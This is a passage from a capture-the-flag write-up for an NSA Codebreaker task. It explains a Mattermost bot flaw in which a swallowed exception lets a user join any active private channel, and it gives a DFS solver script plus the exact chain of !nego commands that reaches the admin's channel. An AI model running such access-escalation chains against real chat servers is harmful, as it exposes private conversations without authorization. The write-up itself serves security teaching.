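    if not user4.startswith("mod_"):
        return None, "You must have a mod"
    return (channel_name, user2, user3, user4), None
```

One detail that stands out when the checks are isolated like this: although the usage string talks about two moderators, only the final argument is tested for the mod_ prefix.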

bot/plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
def handle_nego(self : Plugin, message: Message, *args):
    logger.debug(f"handle_nego called with message: {message.text}")
    args = message.text.strip().split()
    if len(args) != 5:
        self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2")
        logger.warning("handle_nego: Incorrect number of arguments")
        return
    user1 = message.sender_name
    _, channel_name, user2, user3, user4 = args[:6]
    if not user4.startswith('mod_'):
        self.driver.reply_to(message, f"You must have a mod")
        return
    display_name = channel_name
    team_name = self.driver.options.get('team', 'malwarecentral')
    print(f"[DEBUG] Looking up team: {team_name}")
    # Get team info
    team = self.driver.teams.get_team_by_name(team_name)
    logger.debug(f"Team API response: {team}")
    team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
    print(f"[DEBUG] team_id: {team_id}")
    # Create channel
    channel_options = {
        "team_id": team_id,
        "name": channel_name,
        "display_name": display_name,
        "type": "P"
    }
    logger.debug(f"Creating channel with options: {channel_options}")
    try:
        channel = self.driver.channels.create_channel(channel_options)
        print(f"[DEBUG] Channel API response: {channel}")
    #hide weird exception when we have an archived channel with the same name, we'll just unarchive it
    except Exception as e:
        print(f"[DEBUG] Exception while creating channel: {e}")
        # Try to unarchive the channel if it exists
        try:
            archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
            if archived_channel and archived_channel.get('delete_at') > 0:
                logger.info(f"Unarchiving existing channel: {archived_channel}")
                self.driver.channels.unarchive_channel(archived_channel.get('id'))
                channel = archived_channel
        except Exception as e:
            self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
    #we either created a new channel or unarchived an existing one
    print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
    channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
    channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
    print(f"[DEBUG] channel_id: {channel_id}")
    # Get user ids
    user_ids = []
    for uname in [user1, user2, user3, user4]:
        logger.debug(f"Looking up user: {uname}")
        user = self.driver.users.get_user_by_username(uname)
        logger.debug(f"User API response: {user}")
        uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
        logger.debug(f"user_id for {uname}: {uid}")
        if not uid:
            self.driver.reply_to(message, f"User not found: {uname}")
            logger.warning(f"handle_nego: User not found: {uname}")
            return
        user_ids.append(uid)
    if len(set(user_ids)) != 4:
        logger.warning(f"incorrect number of users to run command")
        self.driver.reply_to(message, f"incorrect number of users to run command")
        return
    print(f"[DEBUG] All user_ids: {user_ids}")
    # Check if channel already has members
    existing_members = self.driver.channels.get_channel_members(channel_id)
    existing_member_user_ids = [member.get('user_id') for member in existing_members]
    existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
    if existing_user_ids:
        # If the channel already has members, we should not add them again
        # This is a safeguard against creating duplicate entries in an archived channel
        print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
        return
    # make sure not adding randos
    current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
    if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and
            user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
        self.driver.reply_to(message, f"Could not find users")
        return
    # Add users to channel
    for uid in user_ids:
        logger.debug(f"Adding user {uid} to channel {channel_id}")
        self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")

If you analyze the un-archiving functionality, you’ll realize that if an active channel with the same name already exists, the bot first errors when trying to create it, then errors again when trying to unarchive it. However, this second error is simply caught and the command continues. This means that we can add ourselves to any active channel whose name we know, as long as we satisfy the other requirements of the command.
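
To make that control flow concrete, here is a minimal sketch of the same try/except shape. The stubs `create_channel` and `unarchive_channel` and the `ChannelExists` error are hypothetical stand-ins for the real driver calls, so this only illustrates the swallowed exception, not the bot's actual API behavior.

```python
class ChannelExists(Exception):
    """Hypothetical stand-in for the error raised when a name is taken."""


def create_channel(name, existing):
    # Stub: creation fails for any name that is already in use.
    if name in existing:
        raise ChannelExists(name)
    existing[name] = {"id": f"id-{name}", "delete_at": 0}
    return existing[name]


def unarchive_channel(channel):
    # Stub: unarchiving only works on channels that are actually archived.
    if channel["delete_at"] == 0:
        raise ValueError("channel is not archived")
    channel["delete_at"] = 0


def resolve_channel(name, existing):
    log = []
    try:
        create_channel(name, existing)
        log.append("created")
    except Exception:
        try:
            unarchive_channel(existing[name])
            log.append("unarchived")
        except Exception as e:
            # Like the bot, record the failure but do not return.
            log.append(f"failed: {e}")
    # Every path falls through to this lookup, including the failure path.
    return existing[name]["id"], log


active = {"secret": {"id": "id-secret", "delete_at": 0}}
print(resolve_channel("secret", active))
```

Because the inner handler never returns, an active channel's ID is handed to the rest of the command exactly as if the channel had just been created.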

Starting from top to bottom, these other requirements are:

  1. The user4 we provide must start with mod_, meaning they must be a moderator.
  2. We must provide 4 unique users, checked by user IDs.
  3. None of the users we provide can exist in the requested channel already.
  4. All 4 users must already be members of the channel where we issue the command.
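
The four checks above can be sketched as a single predicate. This is a simplification under stated assumptions: it compares usernames rather than user IDs, and `nego_allowed` and its parameters are names made up for illustration. The membership sets in the example are copied from the channel dump later in this writeup.

```python
def nego_allowed(sender, seller, mod1, mod2, source_members, target_members):
    """Return True if `!nego target seller mod1 mod2` should pass the bot's checks."""
    users = [sender, seller, mod1, mod2]
    if not mod2.startswith("mod_"):              # 1. only the last name is checked
        return False
    if len(set(users)) != 4:                     # 2. four distinct users
        return False
    if any(u in target_members for u in users):  # 3. nobody already in the target
        return False
    return all(u in source_members for u in users)  # 4. everyone in the source


public = {"mod_murkygatorade10", "emptyshads41", "cruelbass14", "bubblyowl66",
          "giddythrushe28", "cautiousferret5", "malbot", "resolvedpoultry53",
          "insecurebasmati34"}
channel62240 = {"wrathfulfalcon8", "mod_affectedeagle51", "mod_euphoriccoati77",
                "emptyshads41", "bubblyowl66", "giddythrushe28", "resolvedpoultry53",
                "malbot", "mod_wingedlion39", "mod_aboardhoopoe59",
                "mod_ecstaticcheese60"}

print(nego_allowed("cautiousferret5", "cruelbass14", "insecurebasmati34",
                   "mod_murkygatorade10", public, channel62240))
```

Note that only the last argument has to carry the mod_ prefix, so the "moderator1" slot can be filled by any regular user.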

That’s great, but what channel are we actually trying to access? Let’s go back and look at the Mattermost instance again.

Dumping the Mattermost channels

Using Mattermost’s built-in mmctl CLI tool, we can dump all the channels and users in the instance.

Terminal window
$ docker compose exec mattermost mmctl --local channel list malwarecentral
public
channel14210 (private)
channel15769 (private)
channel23011 (private)
channel28375 (private)
channel36984 (private)
channel37915 (private)
channel41964 (private)
channel42011 (private)
channel43502 (private)
channel45015 (private)
channel46360 (private)
channel51816 (private)
channel56398 (private)
channel60311 (private)
channel60871 (private)
channel6153 (private)
channel62240 (private)
channel62739 (private)
channel64089 (private)
channel76379 (private)
channel77848 (private)
channel78377 (private)
channel91739 (private)
There are 24 channels on local instance
Terminal window
$ docker compose exec mattermost mmctl --local user list
sqeoydebhtdpxreb36ddc1ztxr: admin_zestysnail91 (admin_zestysnail91@malware.xyz)
nccuidn66fngdy3psuoearaacw: alertfish82 (alertfish82@malware.xyz)
nmaweowaup8c3cagki3e6q5r5o: bubblyowl66 (bubblyowl66@malware.xyz)
4o3okzr34in6xkdmsrahtzxskw: calls (calls@localhost)
5uo9s769utfa3m8wjq1hkgmpih: cautiousferret5 (cautiousferret5@malware.xyz)
rbtwjkm6hfgy8badbenz8t7fca: cruelbass14 (cruelbass14@malware.xyz)
jtqbrh6s7irwjr7jrzokpkfhwa: emptyshads41 (emptyshads41@malware.xyz)
nwfsa6s5iig4fyb4w643u8qkga: giddythrushe28 (giddythrushe28@malware.xyz)
zxkh7mqq5pre7pkzghwj6uy6ra: insecurebasmati34 (insecurebasmati34@malware.xyz)
eidtpjuz8jy3bd5zd3bzhsdjpr: malbot (malbot@localhost)
4zdxb76a17fiz8r43gri7ctbwy: mod_aboardhoopoe59 (mod_aboardhoopoe59@malware.xyz)
jeswn63kmjb1ixhfmxz4crfewa: mod_affectedeagle51 (mod_affectedeagle51@malware.xyz)
bhsh5hnx57fcf8rpud5w8xn8dc: mod_ecstaticcheese60 (mod_ecstaticcheese60@malware.xyz)
txjizyhehin67q64wektejoczy: mod_euphoriccoati77 (mod_euphoriccoati77@malware.xyz)
r9uhopksxfgy8xz8ifpk5y47wh: mod_murkygatorade10 (mod_murkygatorade10@malware.xyz)
1tmkcjt6m3g59kry1pfixqznzr: mod_wingedlion39 (mod_wingedlion39@malware.xyz)
jg7ie7kxj3bqjrp3rjb8h5e1kc: morbidcoconut10 (morbidcoconut10@malware.xyz)
qufpxm9t9fnjib3satjb5dua1r: playbooks (playbooks@localhost)
oywfbkfe97d1mkyqx3ubsq4p5c: resolvedpoultry53 (resolvedpoultry53@malware.xyz)
cby3we3cmtr33xdrs5twqok9jc: system-bot (system-bot@localhost)
aua8kgt6yp878pct86oefoog8w: thriftyjerky58 (thriftyjerky58@malware.xyz)
p6i8dfapjjrqudmz3qfuyk3mra: wrathfulfalcon8 (wrathfulfalcon8@malware.xyz)
There are 22 users on local instance

While we are at it, we also need to make a token for our bot to actually run. This can also be done with mmctl:

Terminal window
$ docker compose exec mattermost mmctl --local token generate malbot "bot api token"
i6utw8yaytna9xz81sogmrxc6y: bot api token

We can put this token in bot.py and fix the team name at the same time:

bot/bot.py
bot = Bot(
    settings=Settings(
        MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
        MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
        BOT_TOKEN = os.environ.get("BOT_TOKEN", "i6utw8yaytna9xz81sogmrxc6y"),
        BOT_TEAM = os.environ.get("BOT_TEAM", "malwarecentral"),
        SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
        RESPOND_CHANNEL_HELP=True,
    ),
    plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
)

Now back to the nego command. One of the requirements is that none of the users we provide are already members of the target channel, so we need some way to list the members of a given channel. However, as it turns out, there is no way to do that with mmctl!

But I didn’t want to bother figuring out how to use the API directly, so I just hijacked the bot to add a command that would dump the members of a given channel for me. I added the following command to plugin_sales.py:

bot/plugin_sales.py
@listen_to("^!list_users (.*)$", no_direct=True, human_description="!list_users\n\tList all users in the given channel(s).")
def list_users_cmd(self, message: Message, *args):
    logger.debug(f"list_users_cmd called with message: {message.text}")
    args = message.text.strip().split()
    if len(args) < 2:
        self.driver.reply_to(message, "Usage: !list_users channel_name [channel_name ...]")
        logger.warning("list_users_cmd: Incorrect number of arguments")
        return
    _, *channel_names = args
    for channel_name in channel_names:
        team_name = self.driver.options.get('team', 'malwarecentral')
        team = self.driver.teams.get_team_by_name(team_name)
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
        if not channel:
            self.driver.reply_to(message, f"Channel '{channel_name}' not found.")
            logger.warning(f"list_users_cmd: Channel '{channel_name}' not found.")
            return
        channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
        members = self.driver.channels.get_channel_members(channel_id)
        user_list = []
        for member in members:
            user_id = member.get('user_id')
            user = self.driver.users.get_user(user_id)
            username = user.get('username') if isinstance(user, dict) else user.json().get('username')
            user_list.append(username)
        self.driver.reply_to(message, f"Users in channel '{channel_name}':\n{user_list}")
        logger.info(f"list_users_cmd: Listed users in channel '{channel_name}'")

Now we simply take all the channel names we dumped earlier, and run the command on all of them. Then we wait for the bot to do the work for us, and extract the usernames from the replies:

Terminal window
# for some reason other versions may be a bit unstable, blame python
uv venv -p python3.12
source .venv/bin/activate
uv pip install mmpy_bot loguru dotenv
python3 bot.py

bot responding with users in channels

This gives us a final list of channels and their users:

channels.txt
'public':
['mod_murkygatorade10', 'emptyshads41', 'cruelbass14', 'bubblyowl66', 'giddythrushe28', 'cautiousferret5', 'malbot', 'resolvedpoultry53', 'insecurebasmati34']
'channel14210':
['mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'resolvedpoultry53', 'mod_murkygatorade10', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel15769':
['insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel23011':
['giddythrushe28', 'wrathfulfalcon8', 'insecurebasmati34', 'resolvedpoultry53', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'mod_euphoriccoati77', 'malbot']
'channel28375':
['bubblyowl66', 'cruelbass14', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_murkygatorade10', 'mod_wingedlion39', 'mod_affectedeagle51', 'emptyshads41', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'malbot', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel36984':
['thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'cruelbass14', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel37915':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34']
'channel41964':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'resolvedpoultry53', 'mod_euphoriccoati77', 'alertfish82', 'malbot', 'mod_ecstaticcheese60', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel42011':
['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'emptyshads41', 'bubblyowl66', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'mod_aboardhoopoe59', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'admin_zestysnail91', 'insecurebasmati34', 'malbot', 'cruelbass14']
'channel43502':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14']
'channel45015':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel46360':
['mod_aboardhoopoe59', 'morbidcoconut10', 'mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_murkygatorade10', 'insecurebasmati34', 'malbot', 'cruelbass14', 'alertfish82', 'wrathfulfalcon8', 'mod_euphoriccoati77']
'channel51816':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel56398':
['mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'cruelbass14', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'malbot', 'thriftyjerky58', 'mod_affectedeagle51', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel60311':
['alertfish82', 'mod_aboardhoopoe59', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34', 'malbot', 'mod_wingedlion39', 'mod_affectedeagle51', 'morbidcoconut10', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel60871':
['cruelbass14', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'morbidcoconut10', 'alertfish82', 'bubblyowl66', 'malbot', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel6153':
['mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel62240':
['wrathfulfalcon8', 'mod_affectedeagle51', 'mod_euphoriccoati77', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'malbot', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60']
'channel62739':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel64089':
['mod_euphoriccoati77', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel76379':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel77848':
['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel78377':
['emptyshads41', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_wingedlion39', 'insecurebasmati34', 'cruelbass14', 'malbot', 'morbidcoconut10', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'mod_euphoriccoati77']
'channel91739':
['alertfish82', 'mod_euphoriccoati77', 'morbidcoconut10', 'emptyshads41', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51']

Given that admin_zestysnail91 appears in only one channel and is the only admin in the instance, they are probably the adversary we need to reach. That means we somehow need to get into channel42011 using only nego commands.
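
Rather than eyeballing the dump, the "only in one channel" observation can be checked with a few lines. This is a small sketch that assumes the dump has already been loaded into a dict mapping channel names to member lists; the helper name `users_in_one_channel` and the toy data are made up for illustration.

```python
from collections import Counter


def users_in_one_channel(channels):
    """Return the sorted usernames that appear in exactly one channel."""
    counts = Counter(
        user for members in channels.values() for user in set(members)
    )
    return sorted(user for user, n in counts.items() if n == 1)


# Toy data with hypothetical names, only to show the shape of the input.
sample = {
    "lobby": ["me", "alice", "mod_bob"],
    "deals": ["alice", "mod_bob", "admin_eve"],
}
print(users_in_one_channel(sample))
```

On the real dump this should also flag our own account, since cautiousferret5 only belongs to public.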

The final stretch

To find a valid path, we can write a quick DFS script that will check all the channels reachable from every channel we can access, until we find one that contains admin_zestysnail91.

solve.py
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')
channels = {
    channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels
}
ME = 'cautiousferret5'
start = 'public'
end = 'channel42011'
def find_members(channel_a, channel_b):
    # return a group of members that we can use to move from channel_a to channel_b
    usable_members = set(channels[channel_a]) - set(channels[channel_b])
    if ME not in usable_members:
        return None
    usable_members.remove(ME)
    mods = [user for user in usable_members if user.startswith('mod_')]
    if len(mods) < 1:
        return None
    mod = mods[0]
    non_mods = [user for user in usable_members if not user.startswith('mod_')]
    if len(non_mods) < 2:
        return None
    return [ME] + non_mods[:2] + [mod]
def dfs(current, path):
    print(f'At {current}, path {path}')
    for channel in channels:
        members = find_members(current, channel)
        if not members:
            continue
        if channel == end:
            return path + [(channel, members)]
        result = dfs(channel, path + [(channel, members)])
        if result:
            return result
    return None
path = dfs(start, [(start, [])])
for channel, members in path[1:]:
    print(f'!nego {channel} ' + ' '.join(members[1:]))

However, if we run this script, we don’t get anything…

Terminal window
$ python3 solve_1.py
At public, path [('public', [])]
At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'insecurebasmati34', 'cruelbass14', 'mod_murkygatorade10'])]
Traceback (most recent call last):
File "/mnt/c/Users/flocto/Documents/Cybersecurity/2025/NSACodebreaker/task6/writeup/solve_1.py", line 44, in <module>
for channel, members in path:
TypeError: 'NoneType' object is not iterable

I was stuck here for a while until I realized I had overlooked one thing: once we add ourselves to a channel using the !nego command, we bring all the users in the command with us! Then, we can use those users to further move into other channels.
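
In other words, the membership map is not static: every successful !nego grows the target channel. A minimal sketch of that state update, using a hypothetical helper `apply_nego` and toy names rather than the real instance data:

```python
def apply_nego(channels, target, users):
    """Return a new membership map with `users` added to `target`."""
    updated = {name: set(members) for name, members in channels.items()}
    updated[target].update(users)
    return updated


# Toy data: before the move, "vault" only contains mod_d.
before = {"lobby": {"me", "a", "b", "mod_c"}, "vault": {"mod_d"}}
after = apply_nego(before, "vault", ["me", "a", "b", "mod_c"])

# After the move, we and our three companions can be reused from "vault".
print(sorted(after["vault"]))
```

A search that ignores this update can never take a second hop, because our own account is never a member of the channel it just "moved" into.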

Patching the script to account for that, we get the following final version:

solve.py
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')
channels = {
    channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels
}
ME = 'cautiousferret5'
start = 'public'
end = 'channel42011'
def find_members(channel_a, channel_b):
    # return a group of members that we can use to move from channel_a to channel_b
    usable_members = set(channels[channel_a]) - set(channels[channel_b])
    if ME not in usable_members:
        return None
    usable_members.remove(ME)
    mods = [user for user in usable_members if user.startswith('mod_')]
    if len(mods) < 1:
        return None
    mod = mods[0]
    non_mods = [user for user in usable_members if not user.startswith('mod_')]
    if len(non_mods) < 2:
        return None
    return [ME] + non_mods[:2] + [mod]
def dfs(current, path):
    print(f'At {current}, path {path}')
    for channel in channels:
        members = find_members(current, channel)
        if not members:
            continue
        if channel == end:
            return path + [(channel, members)]
        channels[channel].extend(members) # add all members to the channel
        result = dfs(channel, path + [(channel, members)])
        if result:
            return result
    return None
path = dfs(start, [(start, [])])
for channel, members in path[1:]:
    print(f'!nego {channel} ' + ' '.join(members[1:]))

This gives us:

Terminal window
$ python3 solve_1.py
At public, path [('public', [])]
At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10'])]
At channel43502, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77'])]
At channel78377, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77']), ('channel78377', ['cautiousferret5', 'alertfish82', 'wrathfulfalcon8', 'mod_aboardhoopoe59'])]
!nego channel62240 cruelbass14 insecurebasmati34 mod_murkygatorade10
!nego channel43502 wrathfulfalcon8 insecurebasmati34 mod_euphoriccoati77
!nego channel78377 alertfish82 wrathfulfalcon8 mod_aboardhoopoe59
!nego channel42011 alertfish82 morbidcoconut10 mod_affectedeagle51
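
Before pasting a chain like this into Mattermost, it can be sanity-checked offline by replaying it against the dumped memberships. The sketch below is an assumption-laden model of the bot's checks (usernames instead of user IDs, a hypothetical `replay` helper), not the bot's own code.

```python
def replay(channels, start, me, commands):
    """Replay !nego lines against a membership map; return the final channel.

    Raises ValueError as soon as a command would fail one of the checks.
    """
    state = {name: set(members) for name, members in channels.items()}
    current = start
    for line in commands:
        cmd, target, *others = line.split()
        users = [me, *others]
        if cmd != "!nego" or len(others) != 3:
            raise ValueError(f"malformed command: {line}")
        if not others[-1].startswith("mod_"):
            raise ValueError(f"last user is not a mod: {line}")
        if len(set(users)) != 4:
            raise ValueError(f"users are not unique: {line}")
        if state[target] & set(users):
            raise ValueError(f"someone is already in {target}: {line}")
        if not set(users) <= state[current]:
            raise ValueError(f"someone is missing from {current}: {line}")
        state[target].update(users)  # everyone named moves with us
        current = target
    return current


# Toy data with hypothetical names; the real input would be the channel dump.
toy = {"a": ["me", "x", "y", "mod_z"], "b": ["q"], "c": ["y"]}
print(replay(toy, "a", "me", ["!nego b x y mod_z", "!nego c x q mod_z"]))
```

The second toy command only works because `x` and `mod_z` were carried into `b` by the first one, which is the same effect the real chain relies on.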

We can run these commands one by one in Mattermost, and finally we get access to channel42011, where admin_zestysnail91 resides!

reaching the target channel

Submitting the list of commands, we successfully finish task 6.